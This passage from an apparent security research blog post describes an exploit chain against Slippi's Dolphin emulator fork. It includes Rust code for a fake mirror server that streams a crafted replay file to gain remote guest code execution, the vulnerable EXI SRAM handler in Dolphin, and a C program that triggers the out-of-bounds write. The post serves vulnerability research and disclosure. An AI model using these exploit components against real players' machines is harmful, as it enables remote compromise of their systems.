<span class="giallo-l"><span style="color: #9CDCFE;"> peer</span><span style="color: #D4D4D4;">.</span><span style="color: #DCDCAA;">send</span><span>(</span><span style="color: #9CDCFE;">channel_id</span><span>,</span><span style="color: #D4D4D4;"> &</span><span style="color: #9CDCFE;">packet</span><span>)</span><span style="color: #D4D4D4;">.</span><span style="color: #DCDCAA;">unwrap</span><span>();</span></span>
<span class="giallo-l"><span> };</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #569CD6;"> let</span><span style="color: #9CDCFE;"> request</span><span style="color: #D4D4D4;"> =</span><span> serde_json</span><span style="color: #D4D4D4;">::</span><span style="color: #DCDCAA;">from_str</span><span style="color: #D4D4D4;">::</span><span><</span><span style="color: #4EC9B0;">MirrorRequest</span><span>>(</span><span style="color: #9CDCFE;">message</span><span>)</span><span style="color: #D4D4D4;">.</span><span style="color: #DCDCAA;">unwrap</span><span>();</span></span>
<span class="giallo-l"><span style="color: #C586C0;"> match</span><span style="color: #9CDCFE;"> request</span><span> {</span></span>
<span class="giallo-l"><span style="color: #4EC9B0;"> MirrorRequest</span><span style="color: #D4D4D4;">::</span><span style="color: #4EC9B0;">ConnectRequest</span><span> {</span><span style="color: #569CD6;"> mut</span><span style="color: #9CDCFE;"> cursor</span><span> }</span><span style="color: #D4D4D4;"> =></span><span> {</span></span>
<span class="giallo-l"><span style="color: #DCDCAA;"> println!</span><span>(</span><span style="color: #CE9178;">"Sending reply"</span><span>);</span></span>
<span class="giallo-l"><span style="color: #DCDCAA;"> send_packet</span><span>(MirrorResponse</span><span style="color: #D4D4D4;">::</span><span style="color: #4EC9B0;">ConnectReply</span><span> {</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> nick</span><span style="color: #D4D4D4;">:</span><span style="color: #CE9178;"> "Slippi Online"</span><span>,</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> version</span><span style="color: #D4D4D4;">:</span><span style="color: #CE9178;"> "3.5.1"</span><span>,</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> cursor</span><span>,</span></span>
<span class="giallo-l"><span> });</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #DCDCAA;"> println!</span><span>(</span><span style="color: #CE9178;">"Waiting a bit..."</span><span>);</span></span>
<span class="giallo-l"><span> std</span><span style="color: #D4D4D4;">::</span><span>thread</span><span style="color: #D4D4D4;">::</span><span style="color: #DCDCAA;">sleep</span><span>(Duration</span><span style="color: #D4D4D4;">::</span><span style="color: #DCDCAA;">from_secs</span><span>(</span><span style="color: #B5CEA8;">10</span><span>));</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #DCDCAA;"> println!</span><span>(</span><span style="color: #CE9178;">"Sending replay data..."</span><span>);</span></span>
<span class="giallo-l"><span style="color: #DCDCAA;"> send_packet</span><span>(MirrorResponse</span><span style="color: #D4D4D4;">::</span><span style="color: #4EC9B0;">StartGame</span><span> {</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> cursor</span><span>,</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> next_cursor</span><span style="color: #D4D4D4;">:</span><span style="color: #9CDCFE;"> cursor</span><span style="color: #D4D4D4;"> +</span><span style="color: #B5CEA8;"> 1</span><span>,</span></span>
<span class="giallo-l"><span> });</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> cursor</span><span style="color: #D4D4D4;"> +=</span><span style="color: #B5CEA8;"> 1</span><span>;</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #569CD6;"> let mut</span><span style="color: #9CDCFE;"> cmd_lengths</span><span style="color: #D4D4D4;">:</span><span style="color: #4EC9B0;"> HashMap</span><span><</span><span style="color: #4EC9B0;">u8</span><span>,</span><span style="color: #4EC9B0;"> u16</span><span>></span><span style="color: #D4D4D4;"> =</span><span style="color: #4EC9B0;"> HashMap</span><span style="color: #D4D4D4;">::</span><span style="color: #DCDCAA;">new</span><span>();</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #569CD6;"> let mut</span><span style="color: #9CDCFE;"> reader</span><span style="color: #D4D4D4;"> =</span></span>
<span class="giallo-l"><span style="color: #4EC9B0;"> BufReader</span><span style="color: #D4D4D4;">::</span><span style="color: #DCDCAA;">new</span><span>(File</span><span style="color: #D4D4D4;">::</span><span style="color: #DCDCAA;">open</span><span>(</span><span style="color: #CE9178;">"../gecko/exploit.slp"</span><span>)</span><span style="color: #D4D4D4;">.</span><span style="color: #DCDCAA;">unwrap</span><span>());</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> reader</span><span style="color: #D4D4D4;">.</span><span style="color: #DCDCAA;">seek</span><span>(SeekFrom</span><span style="color: #D4D4D4;">::</span><span style="color: #DCDCAA;">Start</span><span>(</span><span style="color: #B5CEA8;">0xF</span><span>))</span><span style="color: #D4D4D4;">.</span><span style="color: #DCDCAA;">unwrap</span><span>();</span></span>
<span class="giallo-l"><span style="color: #C586C0;"> loop</span><span> {</span></span>
<span class="giallo-l"><span style="color: #569CD6;"> let</span><span style="color: #9CDCFE;"> cmd</span><span style="color: #D4D4D4;"> =</span><span style="color: #9CDCFE;"> reader</span><span style="color: #D4D4D4;">.</span><span style="color: #DCDCAA;">read_u8</span><span>()</span><span style="color: #D4D4D4;">.</span><span style="color: #DCDCAA;">unwrap</span><span>();</span></span>
<span class="giallo-l"><span style="color: #DCDCAA;"> println!</span><span>(</span><span style="color: #CE9178;">"Handling event 0x{cmd:X}"</span><span>);</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #C586C0;"> match</span><span style="color: #9CDCFE;"> cmd</span><span> {</span></span>
<span class="giallo-l"><span style="color: #6A9955;"> // Event Payloads</span></span>
<span class="giallo-l"><span style="color: #B5CEA8;"> 0x35</span><span style="color: #D4D4D4;"> =></span><span> {</span></span>
<span class="giallo-l"><span style="color: #569CD6;"> let</span><span style="color: #9CDCFE;"> size</span><span style="color: #D4D4D4;"> =</span><span style="color: #9CDCFE;"> reader</span><span style="color: #D4D4D4;">.</span><span style="color: #DCDCAA;">read_u8</span><span>()</span><span style="color: #D4D4D4;">.</span><span style="color: #DCDCAA;">unwrap</span><span>();</span></span>
<span class="giallo-l"><span style="color: #569CD6;"> let</span><span style="color: #9CDCFE;"> event_buf</span><span style="color: #D4D4D4;"> =</span><span> {</span></span>
<span class="giallo-l"><span style="color: #569CD6;"> let mut</span><span style="color: #9CDCFE;"> buf</span><span style="color: #D4D4D4;"> =</span><span style="color: #DCDCAA;"> vec!</span><span>[</span><span style="color: #B5CEA8;">0</span><span style="color: #4EC9B0;">u8</span><span>;</span><span style="color: #9CDCFE;"> size</span><span style="color: #569CD6;"> as</span><span style="color: #4EC9B0;"> usize</span><span style="color: #D4D4D4;"> +</span><span style="color: #B5CEA8;"> 1</span><span>];</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> buf</span><span>[</span><span style="color: #B5CEA8;">0</span><span>]</span><span style="color: #D4D4D4;"> =</span><span style="color: #9CDCFE;"> cmd</span><span>;</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> buf</span><span>[</span><span style="color: #B5CEA8;">1</span><span>]</span><span style="color: #D4D4D4;"> =</span><span style="color: #9CDCFE;"> size</span><span>;</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> reader</span><span style="color: #D4D4D4;">.</span><span style="color: #DCDCAA;">read_exact</span><span>(</span><span style="color: #D4D4D4;">&</span><span style="color: #569CD6;">mut</span><span style="color: #9CDCFE;"> buf</span><span>[</span><span style="color: #B5CEA8;">2</span><span style="color: #D4D4D4;">..</span><span>])</span><span style="color: #D4D4D4;">.</span><span style="color: #DCDCAA;">unwrap</span><span>();</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> buf</span></span>
<span class="giallo-l"><span> };</span></span>
<span class="giallo-l"><span style="color: #569CD6;"> let mut</span><span style="color: #9CDCFE;"> event_reader</span><span style="color: #D4D4D4;"> =</span><span style="color: #4EC9B0;"> Cursor</span><span style="color: #D4D4D4;">::</span><span style="color: #DCDCAA;">new</span><span>(</span><span style="color: #D4D4D4;">&</span><span style="color: #9CDCFE;">event_buf</span><span>[</span><span style="color: #B5CEA8;">2</span><span style="color: #D4D4D4;">..</span><span>]);</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #C586C0;"> for</span><span style="color: #9CDCFE;"> _</span><span style="color: #569CD6;"> in</span><span style="color: #B5CEA8;"> 0</span><span style="color: #D4D4D4;">..</span><span style="color: #9CDCFE;">size</span><span style="color: #D4D4D4;"> /</span><span style="color: #B5CEA8;"> 3</span><span> {</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> cmd_lengths</span><span style="color: #D4D4D4;">.</span><span style="color: #DCDCAA;">insert</span><span>(</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> event_reader</span><span style="color: #D4D4D4;">.</span><span style="color: #DCDCAA;">read_u8</span><span>()</span><span style="color: #D4D4D4;">.</span><span style="color: #DCDCAA;">unwrap</span><span>(),</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> event_reader</span></span>
<span class="giallo-l"><span style="color: #D4D4D4;"> .</span><span style="color: #DCDCAA;">read_u16</span><span style="color: #D4D4D4;">::</span><span><byteorder</span><span style="color: #D4D4D4;">::</span><span style="color: #4EC9B0;">BigEndian</span><span>>()</span></span>
<span class="giallo-l"><span style="color: #D4D4D4;"> .</span><span style="color: #DCDCAA;">unwrap</span><span>(),</span></span>
<span class="giallo-l"><span> );</span></span>
<span class="giallo-l"><span> }</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #569CD6;"> let</span><span style="color: #9CDCFE;"> payload</span><span style="color: #D4D4D4;"> =</span><span> BASE64_STANDARD</span><span style="color: #D4D4D4;">.</span><span style="color: #DCDCAA;">encode</span><span>(</span><span style="color: #D4D4D4;">&</span><span style="color: #9CDCFE;">event_buf</span><span>);</span></span>
<span class="giallo-l"><span style="color: #DCDCAA;"> send_packet</span><span>(MirrorResponse</span><span style="color: #D4D4D4;">::</span><span style="color: #4EC9B0;">GameEvent</span><span> {</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> payload</span><span style="color: #D4D4D4;">: &</span><span style="color: #9CDCFE;">payload</span><span>,</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> cursor</span><span style="color: #D4D4D4;">:</span><span style="color: #9CDCFE;"> cursor</span><span>,</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> next_cursor</span><span style="color: #D4D4D4;">:</span><span style="color: #9CDCFE;"> cursor</span><span style="color: #D4D4D4;"> +</span><span style="color: #B5CEA8;"> 1</span><span>,</span></span>
<span class="giallo-l"><span> });</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> cursor</span><span style="color: #D4D4D4;"> +=</span><span style="color: #B5CEA8;"> 1</span><span>;</span></span>
<span class="giallo-l"><span> }</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> x</span><span style="color: #D4D4D4;"> =></span><span> {</span></span>
<span class="giallo-l"><span style="color: #C586C0;"> if</span><span style="color: #569CD6;"> let</span><span style="color: #4EC9B0;"> Some</span><span>(</span><span style="color: #D4D4D4;">&</span><span style="color: #9CDCFE;">length</span><span>)</span><span style="color: #D4D4D4;"> =</span><span style="color: #9CDCFE;"> cmd_lengths</span><span style="color: #D4D4D4;">.</span><span style="color: #DCDCAA;">get</span><span>(</span><span style="color: #D4D4D4;">&</span><span style="color: #9CDCFE;">x</span><span>) {</span></span>
<span class="giallo-l"><span style="color: #569CD6;"> let mut</span><span style="color: #9CDCFE;"> data</span><span style="color: #D4D4D4;"> =</span><span style="color: #DCDCAA;"> vec!</span><span>[</span><span style="color: #B5CEA8;">0</span><span style="color: #4EC9B0;">u8</span><span>;</span><span style="color: #9CDCFE;"> length</span><span style="color: #569CD6;"> as</span><span style="color: #4EC9B0;"> usize</span><span style="color: #D4D4D4;"> +</span><span style="color: #B5CEA8;"> 1</span><span>];</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> data</span><span>[</span><span style="color: #B5CEA8;">0</span><span>]</span><span style="color: #D4D4D4;"> =</span><span style="color: #9CDCFE;"> x</span><span>;</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> reader</span><span style="color: #D4D4D4;">.</span><span style="color: #DCDCAA;">read_exact</span><span>(</span><span style="color: #D4D4D4;">&</span><span style="color: #569CD6;">mut</span><span style="color: #9CDCFE;"> data</span><span>[</span><span style="color: #B5CEA8;">1</span><span style="color: #D4D4D4;">..</span><span>])</span><span style="color: #D4D4D4;">.</span><span style="color: #DCDCAA;">unwrap</span><span>();</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #569CD6;"> let</span><span style="color: #9CDCFE;"> payload</span><span style="color: #D4D4D4;"> =</span><span> BASE64_STANDARD</span><span style="color: #D4D4D4;">.</span><span style="color: #DCDCAA;">encode</span><span>(</span><span style="color: #9CDCFE;">data</span><span>);</span></span>
<span class="giallo-l"><span style="color: #DCDCAA;"> send_packet</span><span>(MirrorResponse</span><span style="color: #D4D4D4;">::</span><span style="color: #4EC9B0;">GameEvent</span><span> {</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> payload</span><span style="color: #D4D4D4;">: &</span><span style="color: #9CDCFE;">payload</span><span>,</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> cursor</span><span style="color: #D4D4D4;">:</span><span style="color: #9CDCFE;"> cursor</span><span>,</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> next_cursor</span><span style="color: #D4D4D4;">:</span><span style="color: #9CDCFE;"> cursor</span><span style="color: #D4D4D4;"> +</span><span style="color: #B5CEA8;"> 1</span><span>,</span></span>
<span class="giallo-l"><span> });</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> cursor</span><span style="color: #D4D4D4;"> +=</span><span style="color: #B5CEA8;"> 1</span><span>;</span></span>
<span class="giallo-l"><span> }</span><span style="color: #C586C0;"> else</span><span> {</span></span>
<span class="giallo-l"><span style="color: #DCDCAA;"> println!</span><span>(</span><span style="color: #CE9178;">"Unhandled command! Stopping..."</span><span>);</span></span>
<span class="giallo-l"><span style="color: #C586C0;"> break</span><span>;</span></span>
<span class="giallo-l"><span> }</span></span>
<span class="giallo-l"><span> }</span></span>
<span class="giallo-l"><span> }</span></span>
<span class="giallo-l"><span> }</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #DCDCAA;"> println!</span><span>(</span><span style="color: #CE9178;">"Should be done now!"</span><span>);</span></span>
<span class="giallo-l"><span> }</span></span>
<span class="giallo-l"><span> }</span></span>
<span class="giallo-l"><span> }</span></span>
<span class="giallo-l"><span> }</span></span>
<span class="giallo-l"><span> }</span></span>
<span class="giallo-l"><span> }</span></span>
<span class="giallo-l"><span> std</span><span style="color: #D4D4D4;">::</span><span>thread</span><span style="color: #D4D4D4;">::</span><span style="color: #DCDCAA;">sleep</span><span>(Duration</span><span style="color: #D4D4D4;">::</span><span style="color: #DCDCAA;">from_millis</span><span>(</span><span style="color: #B5CEA8;">10</span><span>));</span></span>
<span class="giallo-l"><span> }</span></span>
<span class="giallo-l"><span>}</span></span></code></pre>
<p>And with that, I now have a way of getting arbitrary guest code execution remotely! That was a lot of preparation work without any real exploits being written yet, but at least I can finally get to the fun part now.</p>
<h1 id="breaking-out-of-dolphin">Breaking out of Dolphin<a class="zola-anchor" href="#breaking-out-of-dolphin" aria-label="Anchor link for: breaking-out-of-dolphin"><i class="fas fa-link"></i></a>
</h1>
<p>When it comes to memory safety vulnerabilities, <a rel="external" href="https://dougallj.wordpress.com/2016/11/13/exploiting-dolphin-part-1/">console</a> <a rel="external" href="https://www.youtube.com/watch?v=Q3SOYneC7mU">emulators</a> <a rel="external" href="https://www.youtube.com/watch?v=L-L8qWpd_74">don't</a> <a rel="external" href="https://www.youtube.com/watch?v=mHSWxxK6nA8">have</a> <a rel="external" href="https://www.youtube.com/watch?v=zqUYNYWPlpQ">the</a> <a rel="external" href="https://github.com/khang06/HackerSM64-emu-escape">best</a> <a rel="external" href="https://tasvideos.org/8982S">track</a> <a rel="external" href="https://github.com/n64dev/cen64/issues/122">record</a> <em>(yes, those are all separate links)</em>. It's probably some combination of many popular ones having codebases dating back to the early 2000s, the need to emulate lots of different block copies for DMA, and there being more of a focus on just getting the games to work instead of hardening against potentially malicious code. Either way, I think there isn't enough vulnerability research that targets them, given that random ROM hacks or <em>Totally Legitimately Acquired Game Backups</em> also count as untrusted code.</p>
<p>Thankfully for me, in the case of Dolphin, I don't even have to find the vulnerability myself! One of the first changes mentioned in <a rel="external" href="https://dolphin-emu.org/blog/2024/04/30/dolphin-progress-report-february-march-and-april-2024/">Dolphin's February, March, and April 2024 Progress Report</a> is a patch for an easily controllable out-of-bounds read/write, followed by a few paragraphs about why patching these kinds of bugs is important.</p>
<p><img src="/img/slippirce/dolphinvuln.png" alt="" /></p>
<p>The GameCube has a 64-byte region of battery-backed SRAM that it uses to keep track of some basic information like audio settings, screen offset, language (PAL only), and the real-time clock. All of this is configured in the GameCube's Initial Program Loader (IPL), also known as that big cube menu with all of the settings and memory card stuff.</p>
<p><img src="/img/slippirce/ipl.png" alt="" /></p>
<p>This area isn't mapped directly in memory anywhere, but is instead accessed via the External Interface (EXI) bus. This means that data has to be copied to and from main memory via DMA in order to be accessed. Hey, didn't I say something about DMA in emulators leading to some issues earlier?</p>
<p>When an EXI DMA is started, Dolphin calls <code>IEXIDevice::DMAWrite</code> on the appropriate device.</p>
<pre class="giallo" style="color: #E6E6E6; background-color: #222222;"><code data-lang="cpp"><span class="giallo-l"><span style="color: #569CD6;">void</span><span> IEXIDevice::</span><span style="color: #DCDCAA;">DMAWrite</span><span>(</span><span style="color: #4EC9B0;">u32</span><span style="color: #9CDCFE;"> _uAddr</span><span>,</span><span style="color: #4EC9B0;"> u32</span><span style="color: #9CDCFE;"> _uSize</span><span>)</span></span>
<span class="giallo-l"><span>{</span></span>
<span class="giallo-l"><span style="color: #6A9955;"> // _dbg_assert_(EXPANSIONINTERFACE, 0);</span></span>
<span class="giallo-l"><span style="color: #C586C0;"> while</span><span> (_uSize</span><span style="color: #D4D4D4;">--</span><span>)</span></span>
<span class="giallo-l"><span> {</span></span>
<span class="giallo-l"><span> u8 uByte </span><span style="color: #D4D4D4;">=</span><span> Memory::</span><span style="color: #DCDCAA;">Read_U8</span><span>(_uAddr</span><span style="color: #D4D4D4;">++</span><span>);</span></span>
<span class="giallo-l"><span style="color: #DCDCAA;"> TransferByte</span><span>(uByte);</span></span>
<span class="giallo-l"><span> }</span></span>
<span class="giallo-l"><span>}</span></span></code></pre>
<p><code>IEXIDevice::TransferByte</code> is a virtual function overridden by each device, which in this case is <code>CEXIIPL</code>.</p>
<pre class="giallo" style="color: #E6E6E6; background-color: #222222;"><code data-lang="cpp"><span class="giallo-l"><span style="color: #569CD6;">void</span><span> CEXIIPL::</span><span style="color: #DCDCAA;">TransferByte</span><span>(</span><span style="color: #4EC9B0;">u8</span><span style="color: #569CD6;">&</span><span style="color: #9CDCFE;"> _uByte</span><span>)</span></span>
<span class="giallo-l"><span>{</span></span>
<span class="giallo-l"><span style="color: #6A9955;"> // The first 4 bytes must be the address</span></span>
<span class="giallo-l"><span style="color: #6A9955;"> // If we haven't read it, do it now</span></span>
<span class="giallo-l"><span style="color: #C586C0;"> if</span><span> (m_uPosition </span><span style="color: #D4D4D4;"><=</span><span style="color: #B5CEA8;"> 3</span><span>)</span></span>
<span class="giallo-l"><span> {</span></span>
<span class="giallo-l"><span> m_uAddress </span><span style="color: #D4D4D4;"><<=</span><span style="color: #B5CEA8;"> 8</span><span>;</span></span>
<span class="giallo-l"><span> m_uAddress </span><span style="color: #D4D4D4;">|=</span><span> _uByte;</span></span>
<span class="giallo-l"><span> m_uRWOffset </span><span style="color: #D4D4D4;">=</span><span style="color: #B5CEA8;"> 0</span><span>;</span></span>
<span class="giallo-l"><span> _uByte </span><span style="color: #D4D4D4;">=</span><span style="color: #B5CEA8;"> 0xFF</span><span>;</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #6A9955;"> // Check if the command is complete</span></span>
<span class="giallo-l"><span style="color: #C586C0;"> if</span><span> (m_uPosition </span><span style="color: #D4D4D4;">==</span><span style="color: #B5CEA8;"> 3</span><span>)</span></span>
<span class="giallo-l"><span> {</span></span>
<span class="giallo-l"><span style="color: #6A9955;"> // Get the time...</span></span>
<span class="giallo-l"><span style="color: #DCDCAA;"> UpdateRTC</span><span>();</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #6A9955;"> // ...</span></span>
<span class="giallo-l"><span> }</span></span>
<span class="giallo-l"><span> }</span></span>
<span class="giallo-l"><span style="color: #C586C0;"> else</span></span>
<span class="giallo-l"><span> {</span></span>
<span class="giallo-l"><span style="color: #6A9955;"> // Actually read or write a byte</span></span>
<span class="giallo-l"><span style="color: #C586C0;"> switch</span><span> (</span><span style="color: #DCDCAA;">CommandRegion</span><span>())</span></span>
<span class="giallo-l"><span> {</span></span>
<span class="giallo-l"><span style="color: #C586C0;"> case</span><span> REGION_RTC:</span></span>
<span class="giallo-l"><span style="color: #C586C0;"> if</span><span> (</span><span style="color: #DCDCAA;">IsWriteCommand</span><span>())</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> m_RTC</span><span>[(m_uAddress </span><span style="color: #D4D4D4;">&</span><span style="color: #B5CEA8;"> 0x03</span><span>)</span><span style="color: #D4D4D4;"> +</span><span> m_uRWOffset]</span><span style="color: #D4D4D4;"> =</span><span> _uByte;</span></span>
<span class="giallo-l"><span style="color: #C586C0;"> else</span></span>
<span class="giallo-l"><span> _uByte </span><span style="color: #D4D4D4;">=</span><span style="color: #9CDCFE;"> m_RTC</span><span>[(m_uAddress </span><span style="color: #D4D4D4;">&</span><span style="color: #B5CEA8;"> 0x03</span><span>)</span><span style="color: #D4D4D4;"> +</span><span> m_uRWOffset];</span></span>
<span class="giallo-l"><span style="color: #C586C0;"> break</span><span>;</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #C586C0;"> case</span><span> REGION_SRAM:</span></span>
<span class="giallo-l"><span style="color: #C586C0;"> if</span><span> (</span><span style="color: #DCDCAA;">IsWriteCommand</span><span>())</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> g_SRAM</span><span>.</span><span style="color: #9CDCFE;">p_SRAM</span><span>[(m_uAddress </span><span style="color: #D4D4D4;">&</span><span style="color: #B5CEA8;"> 0x3F</span><span>)</span><span style="color: #D4D4D4;"> +</span><span> m_uRWOffset]</span><span style="color: #D4D4D4;"> =</span><span> _uByte;</span></span>
<span class="giallo-l"><span style="color: #C586C0;"> else</span></span>
<span class="giallo-l"><span> _uByte </span><span style="color: #D4D4D4;">=</span><span style="color: #9CDCFE;"> g_SRAM</span><span>.</span><span style="color: #9CDCFE;">p_SRAM</span><span>[(m_uAddress </span><span style="color: #D4D4D4;">&</span><span style="color: #B5CEA8;"> 0x3F</span><span>)</span><span style="color: #D4D4D4;"> +</span><span> m_uRWOffset];</span></span>
<span class="giallo-l"><span style="color: #C586C0;"> break</span><span>;</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #6A9955;"> // ...</span></span>
<span class="giallo-l"><span> }</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span> m_uRWOffset</span><span style="color: #D4D4D4;">++</span><span>;</span></span>
<span class="giallo-l"><span> }</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span> m_uPosition</span><span style="color: #D4D4D4;">++</span><span>;</span></span>
<span class="giallo-l"><span>}</span></span></code></pre>
<p><code>m_uRWOffset</code> is incremented for each byte accessed but is never checked against the bounds of <code>m_RTC</code> or <code>p_SRAM</code>, leading to a trivial out-of-bounds read and write primitive. To test this, I wrote a quick <a rel="external" href="https://wiibrew.org/wiki/DevkitPPC">devkitPPC</a> program that writes a lot of garbage into SRAM.</p>
<pre class="giallo" style="color: #E6E6E6; background-color: #222222;"><code data-lang="c"><span class="giallo-l"><span style="color: #C586C0;">#include</span><span style="color: #CE9178;"> <string.h></span></span>
<span class="giallo-l"><span style="color: #C586C0;">#include</span><span style="color: #CE9178;"> <gccore.h></span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #6A9955;">// Adapted from internal libogc code</span></span>
<span class="giallo-l"><span style="color: #569CD6;">static void</span><span style="color: #DCDCAA;"> __sram_write</span><span>(</span><span style="color: #569CD6;">void</span><span style="color: #D4D4D4;"> *</span><span style="color: #9CDCFE;">buffer</span><span>, u32 </span><span style="color: #9CDCFE;">size</span><span>) {</span></span>
<span class="giallo-l"><span style="color: #DCDCAA;"> EXI_Lock</span><span>(EXI_CHANNEL_0, EXI_DEVICE_1,</span><span style="color: #569CD6;"> NULL</span><span>);</span></span>
<span class="giallo-l"><span style="color: #DCDCAA;"> EXI_Select</span><span>(EXI_CHANNEL_0, EXI_DEVICE_1, EXI_SPEED8MHZ);</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span> u32 cmd </span><span style="color: #D4D4D4;">=</span><span style="color: #B5CEA8;"> 0xA0000100</span><span>;</span></span>
<span class="giallo-l"><span style="color: #DCDCAA;"> EXI_Imm</span><span>(EXI_CHANNEL_0,</span><span style="color: #D4D4D4;"> &</span><span>cmd,</span><span style="color: #B5CEA8;"> 4</span><span>, EXI_WRITE,</span><span style="color: #569CD6;"> NULL</span><span>);</span></span>
<span class="giallo-l"><span style="color: #DCDCAA;"> EXI_Sync</span><span>(EXI_CHANNEL_0);</span></span>
<span class="giallo-l"><span style="color: #DCDCAA;"> EXI_Dma</span><span>(EXI_CHANNEL_0, buffer, size, EXI_WRITE,</span><span style="color: #569CD6;"> NULL</span><span>);</span></span>
<span class="giallo-l"><span>}</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #569CD6;">int</span><span style="color: #DCDCAA;"> main</span><span>() {</span></span>
<span class="giallo-l"><span style="color: #569CD6;"> static char</span><span style="color: #9CDCFE;"> dummy</span><span>[</span><span style="color: #B5CEA8;">1024</span><span>];</span></span>
<span class="giallo-l"><span style="color: #DCDCAA;"> memset</span><span>(dummy,</span><span style="color: #B5CEA8;"> 0x41</span><span>,</span><span style="color: #569CD6;"> sizeof</span><span>(dummy));</span></span>
<span class="giallo-l"><span style="color: #DCDCAA;"> __sram_write</span><span>(dummy,</span><span style="color: #569CD6;"> sizeof</span><span>(dummy));</span></span>
<span class="giallo-l"><span>}</span></span></code></pre>
<p><img src="/img/slippirce/memcorrupt.png" alt="" /></p>
<p>A free bug that looks exploitable! Nice!</p>
<p>...Wait, that bug was patched two years ago. Why is this Dolphin vulnerable? To answer that, we need a short history lesson.</p>
<p>A long time ago, a developer named Tino created a fork of Dolphin called <a rel="external" href="https://forums.dolphin-emu.org/Thread-unofficial-ishiiruka-dolphin-custom-version">Ishiiruka</a>, which aimed to be a fork that maintained support and improved performance on older hardware but at the cost of accuracy and stability due to some of the hacky workarounds it used. It hasn't been updated since around 2021 and seemed to diverge quite a bit from upstream even back then.</p>
<p>However, there was <em>another</em> fork of Dolphin called <a rel="external" href="https://github.com/FasterMelee/Ishiiruka">Faster Melee</a>, which, as the name implies, was a fork of Dolphin based on Ishiiruka that was specifically tailored for getting better performance out of Dolphin with its built-in Netplay code on Melee. As you might've guessed from the fact that Slippi's Dolphin still says "Faster Melee" in its titlebar, this is what Slippi's build was forked off of. According to the commit history, it seems like FM was last synced with Ishiiruka all the way back in July 2017.</p>
<p>If you think being based on an ancient version of Dolphin from almost a decade ago sounds like it would be really annoying for the developers, you'd be completely right as far as I can tell. There's currently a <a rel="external" href="https://github.com/project-slippi/dolphin">work-in-progress port of Slippi to mainline Dolphin</a>, but it's currently only considered an opt-in beta build. Also, Slippi uses two separate builds of Dolphin: one for actual gameplay and one for replay playback. The mainline Dolphin version currently only supports gameplay, so all replays are played back on Ishiiruka builds.</p>
<p>Anyway, back to figuring out how to exploit the bug. <code>p_SRAM</code> is just the raw byte array representation of the <code>SRAM</code> union and isn't a pointer:</p>
<pre class="giallo" style="color: #E6E6E6; background-color: #222222;"><code data-lang="cpp"><span class="giallo-l"><span style="color: #569CD6;">union</span><span style="color: #4EC9B0;"> SRAM</span><span> {</span></span>
<span class="giallo-l"><span> u8 </span><span style="color: #9CDCFE;">p_SRAM</span><span>[</span><span style="color: #B5CEA8;">64</span><span>];</span></span>
<span class="giallo-l"><span style="color: #569CD6;"> struct</span><span style="color: #6A9955;"> // Stored configuration value from the system SRAM area</span></span>
<span class="giallo-l"><span> {</span></span>
<span class="giallo-l"><span> u16 checksum;</span><span style="color: #6A9955;"> // Holds the block checksum.</span></span>
<span class="giallo-l"><span> u16 checksum_inv;</span><span style="color: #6A9955;"> // Holds the inverse block checksum</span></span>
<span class="giallo-l"><span> u32 ead0;</span><span style="color: #6A9955;"> // Unknown attribute</span></span>
<span class="giallo-l"><span> u32 ead1;</span><span style="color: #6A9955;"> // Unknown attribute</span></span>
<span class="giallo-l"><span> u32 counter_bias;</span><span style="color: #6A9955;"> // Bias value for the realtime clock</span></span>
<span class="giallo-l"><span> s8 display_offsetH;</span><span style="color: #6A9955;"> // Pixel offset for the VI</span></span>
<span class="giallo-l"><span> u8 ntd;</span><span style="color: #6A9955;"> // Unknown attribute</span></span>
<span class="giallo-l"><span> u8 lang;</span><span style="color: #6A9955;"> // Language of system</span></span>
<span class="giallo-l"><span> SRAMFlags flags;</span><span style="color: #6A9955;"> // Device and operations flag</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #6A9955;"> // Stored configuration value from the extended SRAM area</span></span>
